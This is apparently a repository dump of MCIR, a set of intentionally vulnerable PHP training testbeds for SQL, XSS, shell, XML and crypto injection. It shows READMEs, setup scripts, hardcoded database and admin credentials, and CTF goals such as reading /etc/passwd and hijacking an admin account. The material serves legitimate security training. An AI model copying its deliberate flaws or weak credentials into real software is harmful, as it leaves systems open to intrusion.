├── CHANGELOG ├── Dockerfile ├── LICENSE ├── README.cryptomg ├── README.md ├── README.phpwn ├── README.rfidk ├── README.shellol ├── README.sqlol ├── README.xmlmao ├── README.xssmh ├── autoinstall.sh ├── cryptomg ├── challenges.htm ├── chosenct.php ├── chosenpt.php ├── ctf.php ├── ctf │ ├── challenge1 │ │ ├── files │ │ │ ├── hello │ │ │ ├── home │ │ │ ├── links │ │ │ ├── pictures │ │ │ └── test │ │ └── index.php │ ├── challenge2 │ │ ├── db.php │ │ └── index.php │ ├── challenge3 │ │ └── index.php │ ├── challenge4 │ │ ├── db.php │ │ ├── index.php │ │ └── register.php │ ├── challenge5 │ │ ├── files │ │ │ ├── hello │ │ │ ├── home │ │ │ ├── links │ │ │ ├── pictures │ │ │ └── test │ │ └── index.php │ └── index.php ├── includes │ ├── db.inc.php │ ├── header.inc.php │ ├── init.php │ ├── nav.inc.php │ └── settingsBar.inc.php ├── index.php ├── random.php └── style.css ├── docker-compose.yml ├── includes ├── environ.inc.php ├── mcir.css ├── mcir.nav.inc.php ├── mcir.png ├── options.inc.php └── sanitize.inc.php ├── index.php ├── phpwn ├── challenges.php ├── challenges │ ├── challenge0.php │ └── tutorial0.txt ├── eval.php ├── includes │ ├── branding.php │ └── nav.inc.php └── index.php ├── rfidk ├── INSTALL ├── challenges.php ├── challenges │ ├── challenge0.php │ └── tutorial0.txt ├── include.php ├── includes │ ├── branding.php │ └── nav.inc.php ├── index.php └── pages │ └── date.php ├── shellol ├── challenges.htm ├── challenges │ ├── challenge0.php │ ├── challenge1.php │ ├── challenge2.php │ ├── challenge3.php │ ├── challenge4.php │ ├── challenge5.php │ └── challenge6.php ├── includes │ └── nav.inc.php ├── index.php └── shell.php ├── splash └── index.php ├── sqlol ├── challenges.htm ├── challenges │ ├── challenge0.php │ ├── challenge1.php │ ├── challenge10.php │ ├── challenge11.php │ ├── challenge12.php │ ├── challenge13.php │ ├── challenge14.php │ ├── challenge2.php │ ├── challenge3.php │ ├── challenge4.php │ ├── challenge5.php │ ├── challenge6.php │ ├── challenge7.php │ ├── 
challenge8.php │ ├── challenge9.php │ ├── tutorial0.txt │ ├── tutorial1.txt │ ├── tutorial2.txt │ ├── tutorial3.txt │ ├── tutorial4.txt │ ├── tutorial5.txt │ ├── tutorial6.txt │ ├── tutorial7.txt │ ├── tutorial8.txt │ └── tutorial9.txt ├── custom.php ├── delete.php ├── includes │ ├── adodb │ │ ├── .idea │ │ │ ├── adodb.iml │ │ │ ├── copyright │ │ │ │ └── profiles_settings.xml │ │ │ ├── dictionaries │ │ │ │ └── dregad.xml │ │ │ ├── inspectionProfiles │ │ │ │ ├── Project_Default.xml │ │ │ │ └── profiles_settings.xml │ │ │ ├── modules.xml │ │ │ ├── vcs.xml │ │ │ └── workspace.xml │ │ ├── .mailmap │ │ ├── LICENSE.md │ │ ├── README.md │ │ ├── adodb-active-record.inc.php │ │ ├── adodb-active-recordx.inc.php │ │ ├── adodb-csvlib.inc.php │ │ ├── adodb-datadict.inc.php │ │ ├── adodb-error.inc.php │ │ ├── adodb-errorhandler.inc.php │ │ ├── adodb-errorpear.inc.php │ │ ├── adodb-exceptions.inc.php │ │ ├── adodb-iterator.inc.php │ │ ├── adodb-lib.inc.php │ │ ├── adodb-memcache.lib.inc.php │ │ ├── adodb-pager.inc.php │ │ ├── adodb-pear.inc.php │ │ ├── adodb-perf.inc.php │ │ ├── adodb-php4.inc.php │ │ ├── adodb-time.inc.php │ │ ├── adodb-xmlschema.inc.php │ │ ├── adodb-xmlschema03.inc.php │ │ ├── adodb.inc.php │ │ ├── composer.json │ │ ├── contrib │ │ │ └── toxmlrpc.inc.php │ │ ├── cute_icons_for_site │ │ │ ├── adodb.gif │ │ │ └── adodb2.gif │ │ ├── datadict │ │ │ ├── datadict-access.inc.php │ │ │ ├── datadict-db2.inc.php │ │ │ ├── datadict-firebird.inc.php │ │ │ ├── datadict-generic.inc.php │ │ │ ├── datadict-ibase.inc.php │ │ │ ├── datadict-informix.inc.php │ │ │ ├── datadict-mssql.inc.php │ │ │ ├── datadict-mssqlnative.inc.php │ │ │ ├── datadict-mysql.inc.php │ │ │ ├── datadict-mysqli.inc.php │ │ │ ├── datadict-oci8.inc.php │ │ │ ├── datadict-postgres.inc.php │ │ │ ├── datadict-sapdb.inc.php │ │ │ ├── datadict-sqlite.inc.php │ │ │ └── datadict-sybase.inc.php │ │ ├── docs │ │ │ ├── README.md │ │ │ ├── adodb.gif │ │ │ ├── adodb2.gif │ │ │ ├── changelog.md │ │ │ ├── 
changelog_v2.x.md │ │ │ ├── changelog_v3.x.md │ │ │ ├── changelog_v4+5.md │ │ │ └── changelog_v4.x.md │ │ ├── drivers │ │ │ ├── adodb-access.inc.php │ │ │ ├── adodb-ado.inc.php │ │ │ ├── adodb-ado5.inc.php │ │ │ ├── adodb-ado_access.inc.php │ │ │ ├── adodb-ado_mssql.inc.php │ │ │ ├── adodb-ads.inc.php │ │ │ ├── adodb-borland_ibase.inc.php │ │ │ ├── adodb-csv.inc.php │ │ │ ├── adodb-db2.inc.php │ │ │ ├── adodb-db2oci.inc.php │ │ │ ├── adodb-db2ora.inc.php │ │ │ ├── adodb-fbsql.inc.php │ │ │ ├── adodb-firebird.inc.php │ │ │ ├── adodb-ibase.inc.php │ │ │ ├── adodb-informix.inc.php │ │ │ ├── adodb-informix72.inc.php │ │ │ ├── adodb-ldap.inc.php │ │ │ ├── adodb-mssql.inc.php │ │ │ ├── adodb-mssql_n.inc.php │ │ │ ├── adodb-mssqlnative.inc.php │ │ │ ├── adodb-mssqlpo.inc.php │ │ │ ├── adodb-mysql.inc.php │ │ │ ├── adodb-mysqli.inc.php │ │ │ ├── adodb-mysqlpo.inc.php │ │ │ ├── adodb-mysqlt.inc.php │ │ │ ├── adodb-netezza.inc.php │ │ │ ├── adodb-oci8.inc.php │ │ │ ├── adodb-oci805.inc.php │ │ │ ├── adodb-oci8po.inc.php │ │ │ ├── adodb-oci8quercus.inc.php │ │ │ ├── adodb-odbc.inc.php │ │ │ ├── adodb-odbc_db2.inc.php │ │ │ ├── adodb-odbc_mssql.inc.php │ │ │ ├── adodb-odbc_oracle.inc.php │ │ │ ├── adodb-odbtp.inc.php │ │ │ ├── adodb-odbtp_unicode.inc.php │ │ │ ├── adodb-oracle.inc.php │ │ │ ├── adodb-pdo.inc.php │ │ │ ├── adodb-pdo_mssql.inc.php │ │ │ ├── adodb-pdo_mysql.inc.php │ │ │ ├── adodb-pdo_oci.inc.php │ │ │ ├── adodb-pdo_pgsql.inc.php │ │ │ ├── adodb-pdo_sqlite.inc.php │ │ │ ├── adodb-pdo_sqlsrv.inc.php │ │ │ ├── adodb-postgres.inc.php │ │ │ ├── adodb-postgres64.inc.php │ │ │ ├── adodb-postgres7.inc.php │ │ │ ├── adodb-postgres8.inc.php │ │ │ ├── adodb-postgres9.inc.php │ │ │ ├── adodb-proxy.inc.php │ │ │ ├── adodb-sapdb.inc.php │ │ │ ├── adodb-sqlanywhere.inc.php │ │ │ ├── adodb-sqlite.inc.php │ │ │ ├── adodb-sqlite3.inc.php │ │ │ ├── adodb-sqlitepo.inc.php │ │ │ ├── adodb-sybase.inc.php │ │ │ ├── adodb-sybase_ase.inc.php │ │ │ └── adodb-vfp.inc.php │ │ ├── lang │ │ 
│ ├── adodb-ar.inc.php │ │ │ ├── adodb-bg.inc.php │ │ │ ├── adodb-ca.inc.php │ │ │ ├── adodb-cn.inc.php │ │ │ ├── adodb-cz.inc.php │ │ │ ├── adodb-da.inc.php │ │ │ ├── adodb-de.inc.php │ │ │ ├── adodb-en.inc.php │ │ │ ├── adodb-eo.inc.php │ │ │ ├── adodb-es.inc.php │ │ │ ├── adodb-fa.inc.php │ │ │ ├── adodb-fr.inc.php │ │ │ ├── adodb-hu.inc.php │ │ │ ├── adodb-it.inc.php │ │ │ ├── adodb-nl.inc.php │ │ │ ├── adodb-pl.inc.php │ │ │ ├── adodb-pt-br.inc.php │ │ │ ├── adodb-ro.inc.php │ │ │ ├── adodb-ru.inc.php │ │ │ ├── adodb-sv.inc.php │ │ │ ├── adodb-th.inc.php │ │ │ └── adodb-uk.inc.php │ │ ├── nbproject │ │ │ ├── private │ │ │ │ ├── config.properties │ │ │ │ ├── private.properties │ │ │ │ └── private.xml │ │ │ ├── project.properties │ │ │ └── project.xml │ │ ├── pear │ │ │ ├── Auth │ │ │ │ └── Container │ │ │ │ │ └── ADOdb.php │ │ │ ├── auth_adodb_example.php │ │ │ └── readme.Auth.txt │ │ ├── perf │ │ │ ├── perf-db2.inc.php │ │ │ ├── perf-informix.inc.php │ │ │ ├── perf-mssql.inc.php │ │ │ ├── perf-mssqlnative.inc.php │ │ │ ├── perf-mysql.inc.php │ │ │ ├── perf-oci8.inc.php │ │ │ └── perf-postgres.inc.php │ │ ├── pivottable.inc.php │ │ ├── rsfilter.inc.php │ │ ├── server.php │ │ ├── session │ │ │ ├── adodb-compress-bzip2.php │ │ │ ├── adodb-compress-gzip.php │ │ │ ├── adodb-cryptsession.php │ │ │ ├── adodb-cryptsession2.php │ │ │ ├── adodb-encrypt-mcrypt.php │ │ │ ├── adodb-encrypt-md5.php │ │ │ ├── adodb-encrypt-secret.php │ │ │ ├── adodb-encrypt-sha1.php │ │ │ ├── adodb-sess.txt │ │ │ ├── adodb-session-clob.php │ │ │ ├── adodb-session-clob2.php │ │ │ ├── adodb-session.php │ │ │ ├── adodb-session2.php │ │ │ ├── adodb-sessions.mysql.sql │ │ │ ├── adodb-sessions.oracle.clob.sql │ │ │ ├── adodb-sessions.oracle.sql │ │ │ ├── crypt.inc.php │ │ │ ├── old │ │ │ │ ├── adodb-cryptsession.php │ │ │ │ ├── adodb-session-clob.php │ │ │ │ ├── adodb-session.php │ │ │ │ └── crypt.inc.php │ │ │ ├── session_schema.xml │ │ │ └── session_schema2.xml │ │ ├── tests │ │ │ ├── 
benchmark.php │ │ │ ├── client.php │ │ │ ├── pdo.php │ │ │ ├── test-active-record.php │ │ │ ├── test-active-recs2.php │ │ │ ├── test-active-relations.php │ │ │ ├── test-active-relationsx.php │ │ │ ├── test-datadict.php │ │ │ ├── test-perf.php │ │ │ ├── test-pgblob.php │ │ │ ├── test-php5.php │ │ │ ├── test-xmlschema.php │ │ │ ├── test.php │ │ │ ├── test2.php │ │ │ ├── test3.php │ │ │ ├── test4.php │ │ │ ├── test5.php │ │ │ ├── test_rs_array.php │ │ │ ├── testcache.php │ │ │ ├── testdatabases.inc.php │ │ │ ├── testgenid.php │ │ │ ├── testmssql.php │ │ │ ├── testoci8.php │ │ │ ├── testoci8cursor.php │ │ │ ├── testpaging.php │ │ │ ├── testpear.php │ │ │ ├── testsessions.php │ │ │ ├── time.php │ │ │ ├── tmssql.php │ │ │ ├── xmlschema-mssql.xml │ │ │ └── xmlschema.xml │ │ ├── toexport.inc.php │ │ ├── tohtml.inc.php │ │ ├── x.php │ │ ├── xmlschema.dtd │ │ ├── xmlschema03.dtd │ │ └── xsl │ │ │ ├── convert-0.1-0.2.xsl │ │ │ ├── convert-0.1-0.3.xsl │ │ │ ├── convert-0.2-0.1.xsl │ │ │ ├── convert-0.2-0.3.xsl │ │ │ ├── remove-0.2.xsl │ │ │ └── remove-0.3.xsl │ ├── database.config.php │ ├── database.inc.php │ └── nav.inc.php ├── index.php ├── insert.php ├── resetbutton.php ├── select.php └── update.php ├── xmlmao ├── challenges.htm ├── data.xml ├── includes │ └── nav.inc.php ├── index.php ├── xmli_challenges │ ├── challenge0.php │ ├── challenge1.php │ ├── challenge2.php │ ├── challenge3.php │ ├── challenge4.php │ ├── challenge5.php │ ├── tutorial0.txt │ └── tutorial1.txt ├── xmlinjection.php ├── xpath.php ├── xpath_challenges │ ├── challenge0.php │ ├── challenge1.php │ ├── challenge2.php │ ├── challenge3.php │ ├── challenge4.php │ ├── challenge5.php │ ├── challenge6.php │ ├── tutorial0.txt │ ├── tutorial1.txt │ ├── tutorial2.txt │ ├── tutorial3.txt │ ├── tutorial4.txt │ ├── tutorial5.txt │ └── tutorial6.txt ├── xslt.php └── xslt_challenges │ └── challenge0.php └── xssmh ├── challenges.htm ├── challenges ├── challenge0.php ├── challenge1.php ├── challenge2.php ├── 
challenge3.php ├── challenge4.php ├── challenge5.php ├── challenge6.php ├── challenge7.php ├── tutorial0.txt ├── tutorial1.txt ├── tutorial2.txt ├── tutorial3.txt ├── tutorial4.txt └── tutorial5.txt ├── includes └── nav.inc.php ├── index.php ├── pxss.html ├── setup.sh └── xss.php /CHANGELOG: -------------------------------------------------------------------------------- 1 | v1.0 2 | Initial version 3 | 4 | v1.1 5 | Added CryptOMG 6 | Added CPA and CCA tools to CryptOMG 7 | 8 | v1.2 9 | Added PRNG tool to CryptOMG 10 | 11 | v1.2.1 12 | Added XSL injection testbed to XMLmao 13 | 14 | v1.3 15 | Added PHPwn 16 | Added RFIdk 17 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:5.6.13-apache 2 | 3 | # Install extra php modules 4 | RUN apt-get update 5 | RUN apt-get install -y php5-xsl php5-mcrypt libmcrypt-dev libxslt1-dev 6 | RUN docker-php-ext-install mcrypt xsl mysql 7 | 8 | # Add source 9 | COPY . /var/www/html/ 10 | 11 | # Configure mysql credentials / must match the ones in docker-compose.yml 12 | RUN sed -i "s/default_mcir_db_password/mcirpass00112233/" sqlol/includes/database.config.php 13 | RUN sed -i "s/default_mcir_db_password/mcirpass00112233/" cryptomg/includes/db.inc.php 14 | 15 | RUN sed -i "s/localhost/mysqldb/" sqlol/includes/database.config.php 16 | RUN sed -i "s/localhost/mysqldb/" cryptomg/includes/db.inc.php 17 | 18 | # Misc 19 | RUN chmod 666 xssmh/pxss.html 20 | -------------------------------------------------------------------------------- /README.cryptomg: -------------------------------------------------------------------------------- 1 | CryptOMG 2 | Released on SpiderLabs Anterior 3 | Andrew Jordan 4 | https://www.trustwave.com 5 | 6 | INTRODUCTION 7 | ============ 8 | 9 | *** 10 | WARNING: CryptOMG IS AN INTENTIONALLY VULNERABLE APPLICATION. IT SHOULD 11 | ONLY BE INSTALLED ON A TRUSTED WEB ENVIRONMENT. 
IT SHOULD NOT BE PUBLISHED 12 | ON A PRODUCTION SERVER AND SHOULD NOT BE ACCESSIBLE THROUGH THE INTERNET. 13 | *** 14 | 15 | CryptOMG is a configurable CTF style test bed that highlights common 16 | flaws in cryptographic implementations. Most of the challenges are 17 | designed to be cipher independent and to illustrate this, configuration 18 | options are provided that allow you to change the algorithm in use as 19 | well as the type of encoding. 20 | 21 | Cool Stuff Includes: 22 | o Cryptographic Oracles 23 | o Side Channel Attacks 24 | o Electronic Code Book Flaws 25 | o Configuration options for cipher and encoding 26 | 27 | REQUIREMENTS 28 | ============ 29 | 30 | A webserver running PHP 5.x 31 | MySQL 32 | libmcrypt4 33 | 34 | PHP Modules/Libraries: 35 | php5-mysql 36 | php5-mcrypt 37 | 38 | USAGE 39 | ===== 40 | Place the CryptOMG source files somewhere in your webroot. Modify 41 | /includes/db.inc.php with the settings for your database server. 42 | 43 | COPYRIGHT 44 | ========= 45 | 46 | CryptOMG - A configurable CTF style test bed. 47 | Andrew Jordan 48 | Copyright (C) 2014 Trustwave Holdings, Inc. 49 | 50 | This program is free software: you can redistribute it and/or modify it 51 | under the terms of the GNU General Public License as published by the 52 | Free Software Foundation, either version 3 of the License, or (at your 53 | option) any later version. 54 | 55 | This program is distributed in the hope that it will be useful, but 56 | WITHOUT ANY WARRANTY; without even the implied warranty of 57 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General 58 | Public License for more details. 59 | 60 | You should have received a copy of the GNU General Public License along 61 | with this program. If not, see <http://www.gnu.org/licenses/>. 
62 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | :warning: *NOTE: This tool is no longer under active maintenance.* 2 | 3 | 4 | MCIR 5 | ==== 6 | 7 | The Magical Code Injection Rainbow! MCIR is a framework for building code injection vulnerability testbeds. 8 | 9 | MCIR unites SQLol, XMLmao, ShelLOL and XSSmh together in a magical world of code injection! They can experience the magic of feature sharing. Instead of having to wait for unicornFurnace to update each one, all the MCIR friends get updates they can all use! YAY! 10 | 11 | MCIR is designed to be good at making new friends, and they get to share updates to sanitization routines, environmental factor options, and interface tweaks. If you want to make a new friend to join the dancing and singing in the Magical Code Injection Rainbow, you can use any of the existing MCIR friends as a template and rewrite the portion where the friend does its magic, so we can inject ALL the things! YIPPEE! 12 | -------------------------------------------------------------------------------- /README.phpwn: -------------------------------------------------------------------------------- 1 | PHPwn 2 | Ben Loula 3 | http://www.trustwave.com 4 | 5 | INTRODUCTION 6 | ============ 7 | 8 | ***WARNING: PHPwn IS INTENTIONALLY VULNERABLE. 9 | DO NOT USE ON A PRODUCTION WEB SERVER. DO NOT 10 | EXPOSE PHPwn IN AN UNTRUSTED ENVIRONMENT.*** 11 | 12 | PHPwn is a configurable PHP eval() injection testbed. PHPwn allows 13 | you to exploit PHP file inclusion flaws, but furthermore allows 14 | a large amount of control over the manifestation of the flaws. 15 | 16 | PHPwn is based on the idea of SQLol, an earlier release which 17 | allows for SQL injection exploitation. 
18 | 19 | 20 | REQUIREMENTS 21 | ============ 22 | 23 | PHP 5.x 24 | Web server 25 | 26 | USAGE 27 | ===== 28 | 29 | Place the PHPwn source files on your Web server and 30 | open in a Web browser. 31 | 32 | COPYRIGHT 33 | ========= 34 | 35 | PHPwn - A configurable PHP eval() injection testbed 36 | Ben Loula 37 | Copyright (C) 2014 Trustwave Holdings, Inc. 38 | 39 | This program is free software: you can redistribute it and/or modify 40 | it under the terms of the GNU General Public License as published by 41 | the Free Software Foundation, either version 3 of the License, or 42 | (at your option) any later version. 43 | 44 | This program is distributed in the hope that it will be useful, 45 | but WITHOUT ANY WARRANTY; without even the implied warranty of 46 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 47 | GNU General Public License for more details. 48 | 49 | You should have received a copy of the GNU General Public License 50 | along with this program. If not, see <http://www.gnu.org/licenses/> 51 | -------------------------------------------------------------------------------- /README.rfidk: -------------------------------------------------------------------------------- 1 | RFIdk 2 | Daniel Crowley 3 | http://www.trustwave.com 4 | 5 | INTRODUCTION 6 | ============ 7 | 8 | ***WARNING: RFIdk IS INTENTIONALLY VULNERABLE. 9 | DO NOT USE ON A PRODUCTION WEB SERVER. DO NOT 10 | EXPOSE RFIdk IN AN UNTRUSTED ENVIRONMENT.*** 11 | 12 | RFIdk is a configurable PHP file inclusion testbed. RFIdk allows 13 | you to exploit PHP file inclusion flaws, but furthermore allows 14 | a large amount of control over the manifestation of the flaws. 15 | 16 | RFIdk is based on the idea of SQLol, an earlier release which 17 | allows for SQL injection exploitation. 18 | 19 | 20 | REQUIREMENTS 21 | ============ 22 | 23 | PHP 5.x 24 | Web server 25 | 26 | USAGE 27 | ===== 28 | 29 | Place the RFIdk source files on your Web server and 30 | open in a Web browser. 
31 | If needed, set allow_url_fopen to "On" in your PHP ini file. 32 | 33 | COPYRIGHT 34 | ========= 35 | 36 | RFIdk - A configurable PHP file inclusion testbed 37 | Daniel "unicornFurnace" Crowley 38 | Copyright (C) 2014 Trustwave Holdings, Inc. 39 | 40 | This program is free software: you can redistribute it and/or modify 41 | it under the terms of the GNU General Public License as published by 42 | the Free Software Foundation, either version 3 of the License, or 43 | (at your option) any later version. 44 | 45 | This program is distributed in the hope that it will be useful, 46 | but WITHOUT ANY WARRANTY; without even the implied warranty of 47 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 48 | GNU General Public License for more details. 49 | 50 | You should have received a copy of the GNU General Public License 51 | along with this program. If not, see 52 | -------------------------------------------------------------------------------- /README.shellol: -------------------------------------------------------------------------------- 1 | ShellOL 2 | Daniel Crowley 3 | http://www.trustwave.com 4 | 5 | INTRODUCTION 6 | ============ 7 | 8 | ***WARNING: ShellOL IS INTENTIONALLY VULNERABLE. 9 | DO NOT USE ON A PRODUCTION WEB SERVER. DO NOT 10 | EXPOSE shellOL IN AN UNTRUSTED ENVIRONMENT.*** 11 | 12 | ShellOL is a configurable shell command injection testbed. shellOL allows 13 | you to exploit shell command injection flaws, but furthermore allows 14 | a large amount of control over the manifestation of the flaws. 15 | 16 | ShellOL is based on the idea of SQLol, an earlier release which 17 | allows for SQL injection exploitation. 18 | 19 | 20 | REQUIREMENTS 21 | ============ 22 | 23 | PHP 5.x 24 | Web server 25 | 26 | USAGE 27 | ===== 28 | 29 | Place the ShellOL source files on your Web server and 30 | open in a Web browser. 
31 | 32 | COPYRIGHT 33 | ========= 34 | 35 | ShellOL - A configurable shell command injection testbed 36 | Daniel "unicornFurnace" Crowley 37 | Copyright (C) 2014 Trustwave Holdings, Inc. 38 | 39 | This program is free software: you can redistribute it and/or modify 40 | it under the terms of the GNU General Public License as published by 41 | the Free Software Foundation, either version 3 of the License, or 42 | (at your option) any later version. 43 | 44 | This program is distributed in the hope that it will be useful, 45 | but WITHOUT ANY WARRANTY; without even the implied warranty of 46 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 47 | GNU General Public License for more details. 48 | 49 | You should have received a copy of the GNU General Public License 50 | along with this program. If not, see 51 | -------------------------------------------------------------------------------- /README.xmlmao: -------------------------------------------------------------------------------- 1 | XMLmao 2 | Daniel Crowley 3 | http://www.trustwave.com 4 | 5 | INTRODUCTION 6 | ============ 7 | 8 | ***WARNING: XMLmao IS INTENTIONALLY VULNERABLE. 9 | DO NOT USE ON A PRODUCTION WEB SERVER. DO NOT 10 | EXPOSE XMLmao IN AN UNTRUSTED ENVIRONMENT.*** 11 | 12 | XMLmao is a configurable XML/XPath/XSL injection testbed. XMLmao allows 13 | you to exploit XML/XPath injection flaws, but furthermore allows 14 | a large amount of control over the manifestation of the flaws. 15 | 16 | XMLmao is based on the idea of SQLol, an earlier release which 17 | allows for SQL injection exploitation. 18 | 19 | Greetz to the folks at n|u http://null.co.in for giving me the motivation 20 | to code this tool. 21 | 22 | 23 | REQUIREMENTS 24 | ============ 25 | 26 | PHP 5.x 27 | XSLT php module (libxslt) 28 | Web server 29 | 30 | USAGE 31 | ===== 32 | 33 | Place the XMLmao source files on your Web server and 34 | open in a Web browser. 
35 | 36 | COPYRIGHT 37 | ========= 38 | 39 | XMLmao - A configurable XML/XPath injection testbed 40 | Daniel "unicornFurnace" Crowley 41 | Copyright (C) 2014 Trustwave Holdings, Inc. 42 | 43 | This program is free software: you can redistribute it and/or modify 44 | it under the terms of the GNU General Public License as published by 45 | the Free Software Foundation, either version 3 of the License, or 46 | (at your option) any later version. 47 | 48 | This program is distributed in the hope that it will be useful, 49 | but WITHOUT ANY WARRANTY; without even the implied warranty of 50 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 51 | GNU General Public License for more details. 52 | 53 | You should have received a copy of the GNU General Public License 54 | along with this program. If not, see 55 | -------------------------------------------------------------------------------- /README.xssmh: -------------------------------------------------------------------------------- 1 | XSSmh 2 | Daniel Crowley 3 | http://www.trustwave.com 4 | 5 | INTRODUCTION 6 | ============ 7 | 8 | ***WARNING: XSSmh IS INTENTIONALLY VULNERABLE. 9 | DO NOT USE ON A PRODUCTION WEB SERVER. DO NOT 10 | EXPOSE XSSmh IN AN UNTRUSTED ENVIRONMENT.*** 11 | 12 | XSSmh is a configurable Cross-Site Scripting injection testbed. XSSmh allows 13 | you to exploit Cross-Site Scripting flaws, but furthermore allows 14 | a large amount of control over the manifestation of the flaws. 15 | 16 | XSSmh is based on the idea of SQLol, an earlier release which 17 | allows for SQL injection exploitation. 18 | 19 | 20 | REQUIREMENTS 21 | ============ 22 | 23 | PHP 5.x 24 | Web server 25 | 26 | USAGE 27 | ===== 28 | 29 | Place the XSSmh source files on your Web server, run setup.sh and 30 | open in a Web browser. 31 | 32 | COPYRIGHT 33 | ========= 34 | 35 | XSSmh - A configurable Cross-Site Scripting testbed 36 | Daniel "unicornFurnace" Crowley 37 | Copyright (C) 2014 Trustwave Holdings, Inc. 
38 | 39 | This program is free software: you can redistribute it and/or modify 40 | it under the terms of the GNU General Public License as published by 41 | the Free Software Foundation, either version 3 of the License, or 42 | (at your option) any later version. 43 | 44 | This program is distributed in the hope that it will be useful, 45 | but WITHOUT ANY WARRANTY; without even the implied warranty of 46 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 47 | GNU General Public License for more details. 48 | 49 | You should have received a copy of the GNU General Public License 50 | along with this program. If not, see 51 | -------------------------------------------------------------------------------- /autoinstall.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | apt-get install apache2 libapache2-mod-php5 php5-xsl php5-mcrypt mysql-server php5-mysqlnd 3 | echo -n "Please enter your database username: ";read username 4 | echo -n "Please enter your database password: ";read password 5 | mv sqlol/includes/database.config.php sqlol/includes/database.config.php.orig 6 | mv cryptomg/includes/db.inc.php cryptomg/includes/db.inc.php.orig 7 | sed "s/root/$username/" sqlol/includes/database.config.php.orig | sed "s/default_mcir_db_password/$password/" > sqlol/includes/database.config.php 8 | sed "s/root/$username/" cryptomg/includes/db.inc.php.orig | sed "s/default_mcir_db_password/$password/" > cryptomg/includes/db.inc.php 9 | chmod 666 xssmh/pxss.html 10 | echo "Initializing SQLol database..." 11 | php sqlol/resetbutton.php 12 | echo "MCIR should be set up now. Enjoy!" 13 | -------------------------------------------------------------------------------- /cryptomg/challenges.htm: -------------------------------------------------------------------------------- 1 | 12 | 13 | 14 | CryptOMG - Challenges 15 | 16 | 17 | 18 |

CryptOMG - Challenges


19 |
20 |
21 |
22 |
23 | Nothing here yet. 24 |
25 | 26 | 27 | -------------------------------------------------------------------------------- /cryptomg/ctf.php: -------------------------------------------------------------------------------- 1 | . 19 | */ 20 | header("Location: ctf/"); 21 | ?> 22 | 23 | 24 | 25 | CryptOMG 26 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /cryptomg/ctf/challenge1/files/hello: -------------------------------------------------------------------------------- 1 | Hello World 2 | -------------------------------------------------------------------------------- /cryptomg/ctf/challenge1/files/links: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/cryptomg/ctf/challenge1/files/links -------------------------------------------------------------------------------- /cryptomg/ctf/challenge1/files/pictures: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/cryptomg/ctf/challenge1/files/pictures -------------------------------------------------------------------------------- /cryptomg/ctf/challenge1/files/test: -------------------------------------------------------------------------------- 1 | This is a test 2 | -------------------------------------------------------------------------------- /cryptomg/ctf/challenge4/db.php: -------------------------------------------------------------------------------- 1 | . 
19 | */ 20 | 21 | include "../../includes/db.inc.php"; 22 | 23 | $sql_create_table = "CREATE TABLE IF NOT EXISTS challenge4_users ( 24 | id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, 25 | username VARCHAR(32), 26 | password VARCHAR(32), 27 | email VARCHAR(64))"; 28 | $query_create_table = mysqli_query($sql_create_table) or die(mysqli_error()); 29 | 30 | $sql_insert_data = "INSERT INTO challenge4_users (id, username, password, email) 31 | VALUES(1, 'admin', '". 32 | md5("@4rfhaOsd(#d4l;hp)")."', 33 | 'admin@example.org')"; 34 | @$query_insert_data = mysqli_query($sql_insert_data); 35 | 36 | ?> 37 | -------------------------------------------------------------------------------- /cryptomg/ctf/challenge5/files/hello: -------------------------------------------------------------------------------- 1 | Hello World 2 | -------------------------------------------------------------------------------- /cryptomg/ctf/challenge5/files/links: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/cryptomg/ctf/challenge5/files/links -------------------------------------------------------------------------------- /cryptomg/ctf/challenge5/files/pictures: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/cryptomg/ctf/challenge5/files/pictures -------------------------------------------------------------------------------- /cryptomg/ctf/challenge5/files/test: -------------------------------------------------------------------------------- 1 | This is a test 2 | -------------------------------------------------------------------------------- /cryptomg/ctf/index.php: -------------------------------------------------------------------------------- 1 | . 19 | */ 20 | ?> 21 | 22 | 23 | CryptOMG 24 | 25 | 26 |

CryptOMG

27 |
    28 |
  • Challenge 1
    29 |     Access the /etc/passwd file.
  • 30 |
  • Challenge 2
    31 |     Get the admin password.
  • 32 |
  • Challenge 3
    33 |     Decrypt the message.
  • 34 |
  • Challenge 4
    35 |     Hijack the administrator account
  • 36 |
  • Challenge 5
    37 |     Access the /etc/passwd file.
  • 38 |
39 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /cryptomg/includes/db.inc.php: -------------------------------------------------------------------------------- 1 | . 19 | */ 20 | 21 | $db_host = "localhost"; 22 | $db_user = "root"; 23 | $db_pass = "default_mcir_db_password"; 24 | $db_name = "cryptomg"; 25 | 26 | $link = mysql_connect($db_host, $db_user, $db_pass); 27 | if(!$link) 28 | die("database error"); 29 | 30 | mysql_query("CREATE DATABASE IF NOT EXISTS $db_name"); 31 | $db_select = mysql_select_db($db_name, $link); 32 | if(!$db_select) 33 | die("can't select database"); 34 | ?> 35 | -------------------------------------------------------------------------------- /cryptomg/includes/nav.inc.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 |
15 | | Chosen Plaintext Attack || Chosen Ciphertext Attack || Pseudo-Random Number Generator || Challenges || CTF-Style Challenges |
16 |
17 | 18 |
19 |
20 |
21 |
22 | -------------------------------------------------------------------------------- /cryptomg/includes/settingsBar.inc.php: -------------------------------------------------------------------------------- 1 | . 19 | */ 20 | ?> 21 | 22 |
23 |
